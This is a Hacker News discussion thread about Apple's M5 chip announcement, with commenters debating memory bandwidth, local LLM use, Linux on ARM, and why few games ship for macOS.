AIUI the ANE makes use of data in unified memory, not in the register file. So this wouldn't be an inherent limitation. (OTOH, that's why it wastes memory bandwidth for most newer transformer models, which use heavily quantized data - the ANE will have to read padded/unquantized values and the fraction of memory bandwidth that's used for that padding is pure waste.)
hannesfur•4h ago
That would be an interesting approach if true. I hope someone gets to the bottom of it once we have hardware in our hands.
JKCalhoun•4h ago
I can only guess that significant changes in hardware have longer lead times than software (for example). I suppose I am not expecting anything game-changing until the M6.
zuspotirko•3h ago
ofc true. Unified memory is always less than vram. And my 16GB vram aren't enough.

But I think it's also a huge issue Apple makes storage so expensive. If Apple wants local AI to answer your questions it should be able to take your calender, emails, text messages, photos, journal entries etc. into account. It can't do that as nicely as long as customers opt for only 256GB or 1TB devices due to cost

jdlyga•5h ago
If only the Windows ecosystem could make the processor transition as smooth as Mac.
lostmsu•4h ago
I don't think it is the ecosystem. The ARM CPUs not from Apple are just too slow.
wmf•3h ago
X Elite and N1X are fine; the problem is with Windows.
bigyabai•10m ago
As someone who admins Linux and Windows ARM machines, rest assured the issue is not just with Windows. ARM support is best-effort on most distros, and still fairly incomplete even on nixpkgs and Debian unstable.
kotaKat•5h ago
Surprised they aren’t beating the “performance per watt” drum they normally would be on Mx releases. I’m assuming this will be a bit of a snoozer until the M5X/M5 Ultra or an M6 hits the pipeline.

If anything, these refreshes let them get rid of the last old crap on the line for M1 and M2, tie up loose ends with Walmart for the $599 M1 Air they still make for ‘em, and start shipping out the A18 Pro-based Macbooks in November.

ajross•1h ago
They don't have a new process to launch on, so one wouldn't expect a power metric to improve at all.
sbbq•5h ago
The chips are great. Now they just need to improve the quite stagnant laptop hardware to go with it.
alberth•5h ago
Vision Pro went from M2 to M5, that's quite a jump in horse-power.
adamschwartz•3h ago
Also ~200g heavier due in part to the counterweight in the new strap.
outcoldman•5h ago
Marketing:

M5 announcement [1] says 4x the peak GPU compute performance for AI compared to M4. I guess in the lab?

Both iPad and MBP M5 [2][3] say "delivering up to 3.5x the AI performance". But all the examples of AI (in [3]), they are 1.2-2.3X faster than M4. So where this 3.5X is coming from? What tests did Apple do to show that?

---

1. https://www.apple.com/newsroom/2025/10/apple-unleashes-m5-th...

2. https://www.apple.com/newsroom/2025/10/apple-unveils-new-14-...

3. https://www.apple.com/newsroom/2025/10/apple-introduces-the-...

relativeadv•5h ago
Its not uncommon for Apple and others to compare against two generations ago rather than the immediately preceding one
outcoldman•3h ago
I referenced everything about comparing to M4. I left outside the comparison with M1.
storus•2h ago
M5 is supposed to support FP4 natively which would explain the speed up on Q4 quantized models (down from BF16).
exabrial•5h ago
> A nearly 30 percent increase in unified memory bandwidth to 153GB/s

I'll believe the benchmarks, not marketing claims, but an observation and a question.

1. AMD EPYC 4585PX has ~89GB/s, with pretty good latency, as long you use 2xdimm

2. How does this compare to the memory bandwidth and latency of M1,M2,M3,M4 in reality with all of the caveats? It seems like M1 was a monumental leap forward, then everything else was a retraction.

exabrial•5h ago
Apple's software division has lost their way. They've done nothing but add flashy features and move buttons around, deprecating things and breaking backwards compatibility (yeah, 32bit has been awhile now, but alas), meanwhile retreating on stability.

Snow Leopard still remains the company's crown achievement. 0 bloatware, 0 "mobile features on desktop" (wtf is this even a thing?), tuned for absolute speed and stability.

raw_anon_1111•4h ago
They completely removed hardware support for 32 bit software.
morshu9001•10m ago
This was in the Intel generation of Macs. If Windows can support 32-bit software then so should Mac, along with all that 64-bit software that got broken in random Mac updates.

Ironically I can still run old 32-bit Windows software in Wine on my M1 Mac. Windows software is more stable on a Mac than Mac software.

badc0ffee•2h ago
I've heard about rounded corners and low information density windows in Tahoe, but what "mobile features on desktop" are in Sequoia and earlier? The App Store? Launchpad? iCloud? Notifications? You don't need to use those.
morshu9001•11m ago
I liked Snow Leopard too, it was indeed the last focused Mac OS, but there was some memory-related bug that made me update past it. The new OSes aren't so bad, but yeah I don't touch any of the new features.
yalogin•5h ago
It feels like apple is “ a square peg in a round hole” when it comes to AI - atleast for now.

They are not the hardware provider like nvidia, they don’t do the software and services like OpenAI or even Microsoft/oracle. So they are struggling to find a foothold here. I am sure they are working on a lot of things but the only way to showcase them is through their phone which ironically enough feels like not the best path for apple.

Apple’s best option is to put llms locally on the phone and claim privacy (which is true) but they may end up in the same Siri vs others situation, where Siri always is the dumber one.

This is interesting to see how it plays out

mirekrusin•5h ago
Being late in AI race or not entering it from training side is not necessarily bad, others have burned tons of money, if Apple enters with their hardware first (only?) it may disrupt status quo from consumer side. It's not impossible that they'll produce hardware everybody will want to run local models that will be on par with closed ones. If this happens it may change real money flow (as opposed to investor based on imaginary evaluation money that can evaporate).
bob1029•3h ago
> Being late

https://en.wikipedia.org/wiki/First-mover_advantage#Second-m...

mft_•3h ago
They are the leader in manufacturing consumer systems with sufficient high-bandwidth memory to enable decent-sized LLMs to be run locally with reasonable performance. If you want to run something that needs >=32GB of memory (which is frankly bottom-end for a somewhat capable LLM) they're your only widely-available choice (otherwise you've got the rare Strix Halo AI Max+ 395 chip, or you need multiple GPUs, or maybe a self-build based around a Threadripper.)

This might not be widely recognised, as the proportion of people wanting to run capable LLMs locally is likely a rounding error versus the people who use ChatGPT/Claude/Gemini regularly. It's also not something that Apple market on, as they can't monetize it. However, as time goes on and memory and compute power gradually decrease in price, and also maybe as local LLMs continue to increase in ability (?) it may become more and more relevant.

yalogin•1h ago
All current use cases, the ones that caught the public eye, just don't have a need for locally run LLMs. Apple has to come up with functionality that can work with on-device LLMs and that is hard to do. There aren't that many use cases for it as the input vectors all map to an app or camera. Even then a full fledged LLM is always better than a quantized, low precision one running locally. Yeah, increased compute is the way, but not a silver bullet as Vision and Audio bound LLMs require large amounts of memory
bfrog•5h ago
The big win would be a linux capable device. I don't have any interest in mac os x but the apple m parts always seem amazing.

In theory this would be where qualcomm would come in and provide something but in practice they seem to be stuck in qualcomm land where only lawyers matter and actual users and developers can get stuffed.

cogman10•5h ago
Yeah, this is the biggest hole in ARM offerings.

The only well supported devices are either phones or servers with very little in between.

Even common consumer devices like wifi routers will have ARM SOCs with pinned version of the kernel they are attached to which will get supported for 1 to 2 years at most.

mrkeen•5h ago
I have a pretty good time on Asahi Fedora (macbook air M1). It supposedly also supports M2 but no higher.

And it's a PITA to install (needs to be started within macosx, using scripts, with the partitions already in a good state)

Gethsemane•4h ago
If I was less lazy I could probably find this answer online, but how do you find the battery life these days? I'd love to make the switch, but that's the only thing holding me back...
2OEH8eoCRo0•4h ago
How's Thunderbolt and display port alt mode?
mysteria•22m ago
The issue is that it's hacky, and in that case I'd rather go with a Intel or AMD x86 system with more or less out of the box Linux support. What we're looking for is a performant ARM system where Linux is a first class citizen.
walterbell•4h ago
Apparently the Windows exclusivity period has ended, so Google will support Android and ChromeOS on Qualcomm X2-based devices, https://news.ycombinator.com/item?id=45368167
mittermayr•5h ago
This morning I was looking to maybe replace my Macbook Pro 2018, which had the horrible keyboard and finally seems to be crippled enough to not be fun to use anymore — now this!

However, I have been disappointed by Apple too many times (they wouldn't replace my keyboard despite their highly-flamed design-faux-pas, had to replace the battery twice by now, etc.)

Two years ago I finally stopped replacing their expensive external keyboards, which I used to buy once a year or every other (due to broken key-hinges) and have been so incredibly positively surprised by getting used to the MX Keys now. Much better built, incredible mileage for the price. Plus, I can easily switch and use them on my Windows PC, too.

So, about the Macbook — if I were to switch mobile computing over to Windows, what can I replace it with? My main machine is still a Mac Mini M2 Pro, which is perfect value/price. I like the Surface as a concept (replacable keyboards are a fantastic idea, battery however, super iffy nonsense), and I've got a Surface Pro 6 around, but it's essentially the same gloss-premium I don't need for my use.

Are there any much-cheaper but somewhat comparable laptops (12h+ battery, 1 TB disk, 16-32GB RAM, 2k+ Display) with reasonable build quality? Does bypassing the inherent premium of all the Apple gloss open up any useful options? Or is Apple actually providing the best value here?

Would love to hear from non-Surface, non-Thinkpad (I love it, but) folks who've got some recommendations for sub $1k laptops.

Not my main machine, but something I take along train rides, or when going to clients, or sometimes working offsite for a day.

vachina•2h ago
LG Gram SuperSlim. Very light (900grams). I once went hiking with it and forgot the laptop was still in the bag.

But its really only capable of high performance in short bursts because of the extremely small thermal mass.

mittermayr•2h ago
thanks for the hint, spec-wise, this is exactly what I meant, 1tb ssd, 16gb ram, 16 hours of battery, very nice. then I saw it's 1700 EUR where I am at the moment, so pretty much Macbook Pro price :(
alberth•5h ago
Apple is binning the iPad Pro chips:

   Storage      CPU
   ≤ 512GB      3 P-cores (and 6 E-cores)
   1TB+         4 P-cores (and 6 E-cores)
https://www.apple.com/ipad-pro/specs/
tempaccount420•46m ago
Storage-gating is really disgusting considering how much Apple charges for storage.
criddell•5h ago
I wish I could get the nano texture glass on a lower spec iPad Pro. I probably only need the 512 GB model and the glass is only available on 1 and 2 TB modes.
nblgbg•5h ago
32GB is the maximum memory configuration for the 14-inch laptop, which isn’t sufficient for running local LLMs. I think a Mac Studio or Mac Mini with higher memory would be more useful.
reacharavindh•4h ago
One that’s be a nice quality of life improvement in MacBook(Air/Pro) is built-in 5G connectivity. I’d spring for that convenience not needing to connect to a hotspot draining precious battery on my phone. I thought we were closer given Apple started making their own modems, but it is still a miss.
port3000•2h ago
They want you to buy the Apple phone and pair it, so they sell more
pier25•4h ago
Does the M5 feature the UltraFusion connector which would enable the Ultra variant?
ozaiworld•4h ago
that would likely only be present on the Max chip of the M5 generation
pier25•1h ago
thanks I had always assumed it needed to be present in the base design of the chip
dmitshur•4h ago
The claimed 1.6x increase in video game frame rate compared to M4 seems pretty good. Looking forward to seeing it tested out in practice.
Insanity•4h ago
Assume they released this ahead of their end of month event in response to all the leaks from the past weeks.
superkuh•4h ago
I know it's only shared system RAM and not VRAM, but the M5's 150GB/s isn't going to be very fast when doing AI inference. A fairly old rtx 3060 12GB does 360GB/s. But I guess quantity is a quality all of it's own when it comes to RAM and inference.
sidcool•4h ago
I wonder if they informed Jensen about it.
davidw•4h ago
Are we headed back to the bad old days of very proprietary systems, where megacorps dictate everything?
GeekyBear•4h ago
I'd argue that calling the new matrix multiplication unit they added to the GPU cores a neural engine instead of a tensor processing unit is a branding error that will lead to confusion.

The existing neural engine's function is to maximize power efficiency, not flexible performance on models of any size.

bigyabai•3h ago
I'd argue that Apple's definition of "neural engine" was entirely different from what the greater desktop, edge and datacenter markets already considered a "neural engine" to be.

It's an improvement, nomenclature-wise.

ThrowawayR2•4h ago
A computing device named M5 with highly advanced AI capabilities meant for enterprise (or Enterprise) computing environments? Uh-oh, I think I'll pass; I saw this episode of Star Trek (TOS: The Ultimate Computer) before. Hope the owner's manual comes with a warning not to wear a red shirt anywhere near it, dohohoho.

(Perhaps it would be safer to wait for The Next Generation?)

ironman1478•4h ago
It's surprising to me macs aren't a more popular target for games. They're extremely capable machines and they're console-like in that there isn't very much variation in hardware, as opposed to traditional PC gaming. I would think that it's easier to develop a game for a MacBook than a Windows machine where you never know what hardware setup the user will have.
LtdJorge•4h ago
Metal is a very recent API compared to DirectX and OpenGL. Also, there’s very very little people on Mac, and even less that also play videogames. There are almost no libraries and tooling built around Metal and the Mac SDKs, and a very small audience, so it doesn’t make financial sense.
sosodev•4h ago
It's easier to develop a game for a mac in some ways but you reach a tiny fraction of gamers that way.
hangonhn•3h ago
I wonder how that might look once you factor in Apple TV devices. They're pretty weak devices now but future ones can come with M-class CPUs. That's a huge source of potential revenue for Apple.
amluto•3h ago
The current Apple TV is, in many respects, unbelievably bad, and it has nothing to do with the CPU.

Open up the YouTube app and try to navigate the UI. It’s okay but not really up to the Apple standard. Now try to enter text in the search bar. A nearby iPhone will helpfully offer to let you use it like a keyboard. You get a text field, and you can type, and keystrokes are slowly and not entirely reliably propagated to the TV, but text does not stay in sync. And after a few seconds, in the middle of typing, the TV will decide you’re done typing and move focus to a search result, and the phone won’t notice, and it gets completely desynchronized.

ascagnel_•2h ago
The YouTube app has never been good and never felt like a native app -- it's a wrapper around web tech.

More importantly for games, though, is the awful storage architecture around the TV boxes. Games have to slice themselves up into 2GB storage chunks, which can be purged from the system whenever the game isn't actively running. The game has to be aware of missing chunks and download them on-demand.

It makes open-world games nearly impossible, and it makes anything with significant storage requirements effectively impossible. As much as Apple likes to push the iOS port of Death Stranding, that game cannot run on tvOS as currently architected for that reason.

ProfessorZoom•4h ago
i think it depends on how easy it is for a dev to deploy to apple. M1 was great at running call of duty in a windows emulator. iPhone can run the newest resident evil. apple needs to do more to convince developers to deploy to mac
jayd16•4h ago
Mac dev sucks. You're forced to use macos and xcode (for the final build anyway). You're not able to virtualize the build machines.

Apple is actively hostile to how you would build for Linux or PC or console.

nasseri•4h ago
This is simply not the case. Every major game framework/engine targets Mac natively.

If you are building your engine/game from scratch, you absolutely do not need to use Xcode

jayd16•4h ago
Why don't you look through the Unreal and Unity docs and see if you can make a build without a Mac and xcode.
nasseri•3h ago
Yea you’re right I skipped over the part where you said the final build required it.

Nonetheless that’s a small fraction of the time spent actually developing the game.

jayd16•3h ago
Ideally, it's a continuous part of development because you're making daily (or more) builds and testing them.

That makes it a continuous headache to keep your Mac builders up.

It means you need to double dev hardware costs or more as you need a gaming PC to target your core audience and Macs handle the mac bugs.

It means your mac build machines are special snowflakes because you can't just use VMs.

The list goes on and on of Mac being actively hostile to the process.

Just Rider running on a Mac is pleasant sure, but that's not the issue.

nasseri•3h ago
I think I misunderstood your point as “developing a game on Mac sucks”, vs “developing for Mac without a Mac sucks” which I absolutely can’t disagree with
coldtea•4h ago
>Mac dev sucks. You're forced to use macos and xcode (for the final build anyway)

Having to use xcode "for the final build" is irrelevant to the game development experience.

jayd16•3h ago
If you're an indie with just PC hardware it sure as hell matters.
matthew-wegner•3h ago
> You're not able to virtualize the build machines.

Sure you can. And officially, too. Apple still ships a bunch of virtualization drivers in macOS itself. Have a look:

/System/Library/Extensions/IONetworkingFamily.kext/Contents/PlugIns/AppleVmxnet3Ethernet.kext

Whether or not you're using ESXi, or want to, is an entirely different question. But "you're not able to" is simply incorrect. I virtualize several build agents and have for years with no issues.

macOS 26 is the last major version to support Intel, so once macOS 28 is latest this will probably become impossible (macOS 26 should be able to use Xcode 27, but maybe the platform removal will change this previous year's OS support from continuing).

GTP•3h ago
> Apple still ships a bunch of virtualization drivers in macOS itself.

I think OP means virtualizing on something that isn't Apple.

jayd16•3h ago
Interesting. The last I looked into it, you could only officially do this on Mac hardware (defeating the purpose).

You can get an xcode building for arm Macs on PC hardware with this?

ikamm•4h ago
- have to build using XCode on macOS

- have to pay Apple to have your executable signed

- poor Vulkan support

The hardware has never been an issue, it's Apple's walled garden ecosystem.

lazypenguin•4h ago
As far as I’ve seen, Apple is to blame here as they usually make it harder to target their platform and don’t really try to cooperate with the rest of the industry.

As a game developer, I have to literally purchase Apple hardware to test rather than being able to conveniently download a VM

neogodless•3h ago
I'm not a subject matter expert, but I do find it a little odd to read the second half of that. I'd expect, beyond development/debugging, there's certainly a phase of testing that requires hardware that matches your target system?

Like, I get if you develop for consoles, you probably use some kind of emulation on your development workstation, which is probably running Windows. Especially for consoles like XBOX One or newer, and PS4 or newer, which are essentially PCs. And then builds get passed off to a team that has the hardware.

Is anyone developing games for Windows on Apple hardware? Do they run Parallels and call it a day? How is the gaming performance? If the answers to those 3 questions are "yes, yes, great", then Apple supports PC game development better than they support Apple game development?

throwuxiytayq•3h ago
> Like, I get if you develop for consoles, you probably use some kind of emulation on your development workstation

I don’t think anybody does this. I haven’t heard about official emulators for any of the mainstream consoles. Emulation would be prohibitively slow.

Developers usually test on dedicated devkits which are a version of the target console (often with slightly better specs as dev builds need more memory and run more slowly). This is annoying, slow and difficult, but at least you can get these dev kits, usually for a decent price, and there’s a point to trying to ship on those platforms. Meanwhile, nobody plays games on macs, and Apple is making zero effort to bring in the developers or the gamers. It’s a no-chicken-and-no-egg situation, really.

lazypenguin•15m ago
Basically you are correct, MacOS has to be treated like a console in that way. Except you get all the downsides of that development workflow with none of the upsides. The consoles provide excellent debugging and other tools for targeting their platform, can't say the same for MacOS.

For testing, I can do a large amount of testing in a VM for my game. Maybe not 100% and not full user testing but nothing beats running on the native hardware and alpha/beta with real users.

Also, since I can pass through hardware to my VM I can get quite good performance by passing through a physical GPU for example. This is possible and quite straightforward to do on a Linux host. I'm not sure if it's possible using Parallels.

cesarvarela•3h ago
I'm sure you literally purchased Nvidia hardware for game development.
stronglikedan•2h ago
A component is much cheaper than an entire dedicated system (which would of course contain a similar component).
cesarvarela•27m ago
I don't know; a 5090 costs about 3k, a 5070 about 500. You can either buy a MacBook Pro or a Mac Mini. Seems reasonable.
whatever1•3h ago
You do it for Xbox and PlayStation and Nintendo.
jjtheblunt•3h ago
for games, how would you test in a VM, when games so explicitly want direct hardware access?

i am obviously misunderstanding something, i mean.

zulban•2h ago
I run Linux and test my Windows releases on a VM. It works great.

Sure, I'm not doing performance benchmarking and it's just smoke tests and basic user stories, but that's all that 98% of indie developers do for cross platform support.

Apple has been intensely stupid as a platform to launch on, though I did do it eventually. I didn't like Apple before and now I like it even less.

lazypenguin•26m ago
I develop a game that easily runs on much weaker hardware and runs fine in a VM, I would say most simple 3D & 2D games would work fine in a VM on modern hardware.

However, these days it's possible pass-through hardware to your VM so I would be able to pass through a 2nd GPU to MacOS...if it would let me run it as a guest.

Liquix•23m ago
on linux, KVM provides passthrough for GPUs and other hardware, so the VM "steals" the passed through resources from the host and provides near-native performance.
spogbiper•4h ago
you have to release major titles for windows and console, because there are tons of customers using them.

so a mac port, even if simple, is additional cost. there you have the classic chicken and egg problem. the cost doesn't seem to be justified by the number of potential sales, so major studios ignore the platform. and as long as they do, gamers ignore the platform

i've seen it suggested that Apple could solve this standoff by funding the ports, maybe they have done this a few times. but Apple doesn't seem to care much about it

leshenka•3h ago
I was very surprised, and pleasantly too, that Cyberpunk 2077 can maintain 60FPS (14", M4 Pro, 24gb RAM) with only occasional dips. Not with full resolution (actually around FullHD), but at least without "frame generation". Turning frame generation on, it now can output 90-100 FPS depending on environment, but VSync is disabled so dips become way more noticeable.

It even has "for this mac" preset which is good enough that you don't need to tinker with settings to have decent experience.

The game is paused, almost like becomes "frozen" if it's not visible on screen which helps with battery (it can be in the background without any noticeable impact on battery and temperature). Overall way better experience than I expected.

GTP•3h ago
Up to some years ago, it was common for gamers to assemble their own PC, something that you can't do with a Mac. Not sure if this is still common among gamers though.
LarsDu88•1h ago
The advent of silicon interposer technology has made modular memory and separate CPU/GPU soon to be obsolete IMO

The communication bandwidth you can achieve by putting CPU, CPU, and memory together at the factory is much higher than having these components separate.

Sad for enthusiasts, but practically inevitable

shantara•3h ago
The main roadblock for porting the games to Mac has never been the hardware, but Apple themselves. Their entire attitude is that they can do whatever they please with their platforms, and expect the developers to adjust to the changes, no matter how breaking. It’s a constant support treadmill, fixing the stuff that Apple broke in your previously perfectly functioning product after every update. If said fixing is even possible, like when Apple removed support for 32-bit binaries altogether, rendering 3/4 of macOS Steam libraries non-functional. This works for apps, but it‘s completely antithetical to the way game development processes on any other platform are structured. You finish a project, release it, do a patch cycle, and move on.

And that’s not even talking about porting the game to either Metal or an absolutely ancient OpenGL version that could be removed with any upcoming OS version. A significant effort just to address a tiny market.

astrange•3h ago
> If said fixing is even possible, like when Apple removed support for 32-bit binaries altogether, rendering 3/4 of macOS Steam libraries non-functional.

IIRC developers literally got 15 years of warning about that one.

bigyabai•3h ago
IIRC that didn't convince many developers to revisit their software. I still have hard drives full of Pro Tools projects that open on Mojave but error on Catalina. Not to mention all the Steam games that launch fine on Windows/Linux but error on macOS...
astrange•2h ago
Yes, game developers can't revisit old games because they throw out the dev environments when they're done, or their middleware can't get updated, etc.

But it's not possible to keep maintaining 32-bit forever. That's twice the code and it can't support a bunch of important security features, modern ABIs, etc. It would be better to run old programs in a VM of an old OS with no network access.

bigyabai•3m ago
> But it's not possible to keep maintaining 32-bit forever.

Apple had the money to support it, we both know that. They just didn't respect their Mac owners enough, Apple saw more value in making them dogfood iOS changes since that's where all the iOS devs are held captive. Security was never a realistic excuse considering how much real zombie code still exists in macOS.

Speaking personally, I just wanted Apple to wait for WoW64 support to hit upstream. Their careless interruption of my Mac experience is why I ditched the ecosystem as a whole. If Apple cannot invest in making it a premium experience, I'll take my money elsewhere.

ascagnel_•2h ago
Apple's mistake was allowing 32-bit stuff on Intel in the first place -- if they had delayed the migration ~6 months and passed on the Core Duo for Core 2 Duo, it would've negated the need to ever allow 32-bit code on x86.
coffeeaddict1•3h ago
> an absolutely ancient OpenGL version

I still don't get this. Apple is a trillion dollar company. How much does it cost to pay a couple of engineers to maintain an up to date version on top of Metal? Their current implementation is 4.1, it wouldn't cost them much to provide one for 4.6. Even Microsoft collaborated with Mesa to build a translation on top of dx12, Apple could do the same.

mandarax8•2h ago
Their current OpenGL 4.1 actually does run on top of metal making it even more blatantly obvious that they just don't want to.
astrange•1h ago
They can't do Khronos things because they don't get along with Khronos. Same reason they stopped having NVidia GPUs forever ago.
ryandrake•3h ago
The company in general never really seemed that interested in Games, and that came right from Steve Jobs. John Carmack made a Facebook post[1] several years ago with some interesting insider insights about his advocacy of gaming to Steve Jobs, and the lukewarm response he received. They just never really seemed to be a priority at Apple.

1: https://www.facebook.com/permalink.php?story_fbid=2146412825...

astrange•1h ago
It's impossible to care about video games if you live in SV because the weather is too nice. You can feel the desire to do any indoor activity just fade away when you move there. This is somehow true even though there's absolutely nothing to do outside except take walks (or "go hiking" as locals call it) and go to that Egyptian museum run by a cult.

Somehow Atari, EA and PlayStation are here despite this. I don't know how they did it.

Meanwhile, Nintendo is successful because they're in Seattle where it's dark and rains all the time.

zarzavat•19m ago
Gamedevs have not forgotten that Apple attempted to get Unreal Engine banned from all their platforms, thus rug pulling every game built on top of it.

It was only the intervention of Microsoft that managed to save Apple from their own tantrum.

insraq•3h ago
I wrote a post (rant)[1] about my experience of releasing a game on macOS as an indie dev. tl;dr: Apples goes a long way to make the process as painful as possible with tons of paper cuts.

[1] https://ruoyusun.com/2023/10/12/one-game-six-platforms.html#...

Damogran6•3h ago
There's a cost/value calculation that just doesn't work well...I have a Ryzen9/rtx3070 PC ($2k over time) and my M4 Mini ($450) holds it's own for most all normal user stuff...sprinting ahead for specific tasks (Video CODEC)...but the 6 year old dedicated GPU on the PC annihilates the Mini in pushing pixels...You can spec an Apple that does better for gaming, but man, are you gonna pay for it, and still not keep up with current PC GPUS.

Now...something like minecraft or SubNautica? The M4 is fine, especially if you're not pushing 4k 240hz.

Apple has been pushing the gaming experience for years (iPhone 4s?) but it never REALLY seems to land, and when someone has a great gaming seperience in a modern AAA game, they always seem to be using a $4500 Studio or similar.

yieldcrv•3h ago
It's kind of a myth though, Mac has many flagship games and everything in between

If you identify as a "gamer" and are in those communities, then you'll see communities talking about things you can't natively play

but if you leave niches you already have everything

and with microtransactions, Apple ecosystem users are the whales. again, not something that people who identify as "gamers" wants to admit being actually okay with, but those people are not the revenue of game production.

so I would say it is a missed opportunity for developers that are operating on antiquated calculations of MacOS deployment

bigyabai•13m ago
> It's kind of a myth though

It's kinda not. Here's a rough list of the 10 most-played games currently on PC: https://steamdb.info/charts/

macOS is supported by one title (DOTA 2). Windows supports all 10, Linux (the free OS, just so we're clear) runs 7 of the games and has native ports of 5 of them. If you want to go argue to them about missed revenue opportunities then be my guest, but something tells me that DOTA 2 isn't being bankrolled by Mac owners.

If you have any hard figures that demonstrate "antiquated calculations" then now is the time to fetch them for us. I'm somewhat skeptical.

croes•3h ago
Doesn’t MacOS favor an 60Hz output? Gamers prefer much higher rates.

And don’t forget they made an VR headset without controllers.

Apple doesn’t care about games

jsheard•3h ago
> Doesn’t MacOS favor an 60Hz output?

Kind of? It does support higher refresh rates, but their emphasis on "Retina" resolutions imposes a soft limit because monitors that dense rarely support much more than 60hz, due to the sheer bandwidth requirements.

mavbo•3h ago
I play a lot of World of Warcraft on my M3 MacBook Pro which has a native MacOS build. It's a CPU bottlenecked game with most users recommending the AMD X3D CPUs to achieve decent framerates in high end content. I'm able to run said content at high (7/10) graphics settings at 120fps with no audible fan noise for hours at a time on battery. It's been night and day compared to previous Windows machines.
viktorcode•1h ago
The porting is not straightforward; you must switch to Metal, you should adapt rendering pipeline to tiled deferred shading.
jajuuka•9m ago
Multiple solid reasons have been mentioned from ones created by Apple to ones enforced in software by Apple. One that hasn't been mentioned is the lack of marketshare. Macos market is just tiny and very limited. It's also not a growing market. PC gaming isn't blowing up either but the amount of players is just simply higher.

Ports to macos have not done well from what I've heard. However you can see ports on PC do really well and have encouraged studios like Sony and SquareEnix to invest more in PC ports. Even much later after the console versions sell well. Just not a lot of reasons to add the tech debt and complexity of supporting mac as well.

Even big publishers like Blizzard who have been mac devs for a long time axed the dedicate mac team and client and moved to a unified client. This has downfalls like mac specific issues. If those are not critical then they get put in the pile with the rest of the bugs.

jdc0589•3h ago
this is cool and all, but what im really exited about is the possibility that one day they update their laptops so the keys stop leaving marks on the screen.

I know we are a few major scientific breakthroughs away from that even being remotely possible, but it sure would be nice.

maxk42•3h ago
For my use case I need MSL to support fp64. Until that happens I don't care what hardware changes they make: I'm not going to be filling racks with M5s and they're not producing something I can use to even tinker with AI with in my spare time. Apple has lost the AI war before it even got started IMO.
mrbonner•3h ago
I'm waiting for the day when the iphone would be equipped with an M chip. Maybe not long of a wait I hope.
paxys•3h ago
M5 is 4-6x more powerful than M4, which was 5x more powerful than M3, which was 4x more powerful than M2, which was 4x more powerful than M1, which itself was 6x faster than an equivalent Intel processor. Great!

Looking at my Macbook though, I can say with utmost certainty that it isn't 4000x faster than the Intel one I had 5 years ago.

So, where is the disconnect here? Why is actual user experience not able to keep up with benchmarks and marketing?

vintagedave•3h ago
What scares me is that my M2 started seeing performance issues in macOS recently. Safari is sometimes slow (I admit I stress it with many tabs, but it wasn't like this a year ago.) Somehow the graphics in general seems slower on Tahoe, eg the effects when minimising a window.

I am deeply concerned all the performance benefits of the new chips will get eaten away.

conradev•3h ago
That is certainly inevitable, it's just a question of when: https://en.wikipedia.org/wiki/Wirth%27s_law
MobiusHorizons•3h ago
You are probably actually witnessing the reduction in performance of swap as your drive fills up. Check the memory pressure in activity manager. The fix is pretty easy (delete stuff).
vintagedave•2h ago
Thanks, but I have over a hundred gig free. And I got the max RAM I could (24GB.) I feel like the machine _should_ be capable in 2025.
Tagbert•2h ago
26.0 is very much a dot-zero release. It is missing a lot of optimizations and there are some open bugs like memory leaks. Initial reports on 26.1 show a lot of improvement in those. The 3rd beta of 26.1 just came out yesterday. They will probably launch this new version with improved optimizations by end of October.
tmountain•3h ago
Probably synthetic benchmarks that don't represent actual bottlenecks in application usage. How much of what you are doing is actually CPU bound? Your machine still has to do I/O, and even though that's "very fast" these days, it's not happening inside your CPU, so you'll only see the actual improvements when running workloads that benefit from the performance improvements (i.e., complex calculations that can live in the CPU and its cache).
monocasa•3h ago
Each is a different specific benchmark, so they don't stack the way you're doing.

This is 4-6x faster in AI for instance.

tylerhou•3h ago
> M5 is 4-6x more powerful than M4

In GPU performance (probably measured on a specific set of tasks).

condiment•3h ago
It's GPU performance.

Spin up ollama and run some inference on your 5-year-old intel macbook. You won't see 4000x performance improvement (because performance is bottlenecked outside of the GPU), but you might be in the right order of magnitude.

jandrese•3h ago
Comparing GPU performance to some half decade old Intel IGP seems like lying with statistics.

"Look how many times faster our car is![1]"

[1] Compared to a paraplegic octogenarian in a broken wheelchair!"

umanwizard•3h ago
Well, Apple isn’t making that comparison, the OP was.
blihp•3h ago
Not possible given the anemic memory bandwidth [1]... you can scale up the compute all you want but if the memory doesn't scale up as well you're not going to see anywhere near those numbers.

[1] The memory bandwidth is fine for CPU workloads, but not for GPU / NN workloads.

tester756•3h ago
Because this is bullshit, lies, marketing
freehorse•3h ago
They are not 4x more powerful than the previous generation at everything, or even at the same thing every time, so it does not stuck up. Here 4x refers sth wrt LLMs running on the GPU.

I use both an M1 max and an M3 max, and frankly I do not notice much difference if you control for the core count in most stuff. And for running LLMs they are almost the same performance. I think from M1-M3 there was no much performance increase in general.

random3•3h ago
The disconnect is that you're reading sideways.

First line on their website:

> M5 delivers over 4x the peak GPU compute performance for AI compared to M4

It's the GPU not the CPU (which you compare with your old Intel) and it's an AI workload, not your regular workload (which again is what you compare)

bangaladore•3h ago
And they are comparing peak compute. Which means essentially nothing.
random3•2h ago
There was a time when Apple decided throwing random technical numbers shouldn't be the news (those were following the times of Megahertz counting). These times have been changing post Steve Jobs. This said, it is a chip announcement rather than a product announcement, so maybe that is the news.
edmundsauto•2h ago
They also lost big during the megahertz wars. Consumers made it clear that they wanted to see number go up and voted with their wallet. There is probably still some cultural remnant of that era.
tempodox•2h ago
Do not trust any statistics you did not fake yourself.
james4k•3h ago
Those marketing claims are each about a very specific workload, not about general performance. Yes, it is often misleading.
Jnr•3h ago
It states it is "peak performance". Probably in a very specific use case. Or maybe it reaches the peak for an extremely short period of time before it drops the performance.
thebitguru•3h ago
Apple has also seemingly stopped caring about the quality and efficiency of their software. You can see this especially in the latest iOS/iPadOS/macOS 26 versions of their operating systems. They need their software leadership to match their hardware leadership, otherwise good hardware with bad software still leads to bad product, which is what we are seeing now.
taf2•2h ago
i think 15.6.1 (24G90) will be my last mac osx... omarchy is blazing fast
drcongo•2h ago
I see this sentiment a lot, but I've found the OS26 releases to be considerably better than the last few years' OS releases, especially macOS which actually feels coherent now compared to the last few years of janky half baked UI.
cmcaleer•2h ago
It is frankly ridiculous how unintuitive it was to add an email account to Mail on iOS. This is possibly the most basic functionality I would expect an email client to have. One would expect that they go to their list of mailboxes and add a new account.

No. You exit the mail app -> Go to settings -> apps -> scroll through a massive list (that you usually just use for notification settings btw) to go to mail -> mail accounts -> add new account.

Just a simple six-step process after you’ve already hunted for it in the mail app.

jrmg•2h ago
There’s an “Accounts...” entry in the main “Mail” menu.

You can also click the “+” button at the bottom of the list of accounts in the “Accounts” panel in Mail's settings window.

ant6n•2h ago
